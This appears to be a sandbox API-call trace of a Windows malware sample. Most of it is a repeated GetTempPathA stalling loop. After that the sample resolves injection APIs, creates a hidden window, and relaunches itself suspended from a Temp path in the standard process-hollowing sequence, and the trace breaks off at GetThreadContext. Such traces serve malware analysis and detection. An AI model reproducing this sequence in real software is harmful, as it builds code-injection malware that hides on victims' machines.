[0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.317] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.318] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: 
lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.319] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.320] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.478] VirtualProtect (in: lpAddress=0x1834c8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0093.479] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0093.479] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0093.479] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0093.479] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0093.479] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0093.479] GetProcAddress 
(hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0093.480] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0093.480] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0093.480] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0093.480] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0093.480] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0093.489] CreateWindowExA (dwExStyle=0x200, 
lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x7013c [0093.544] PostMessageA (hWnd=0x7013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0093.544] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0093.544] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0093.544] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x150000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\cnuu8vyt.exe")) returned 0x30 [0093.544] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0093.544] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, 
dwProcessId=0xae4, dwThreadId=0xae8)) returned 1 [0093.546] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.546] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x150000 [0093.546] GetThreadContext (in: hThread=0x48, lpContext=0x150000 | out: lpContext=0x150000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), 